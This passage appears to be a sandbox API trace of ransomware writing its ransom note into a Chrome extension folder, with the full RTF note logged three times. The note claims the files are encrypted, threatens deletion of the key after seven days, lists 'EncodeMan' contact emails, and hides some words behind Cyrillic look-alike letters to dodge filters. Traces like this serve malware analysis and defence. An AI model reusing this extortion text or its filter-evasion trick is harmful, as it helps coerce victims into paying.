(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0271.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm 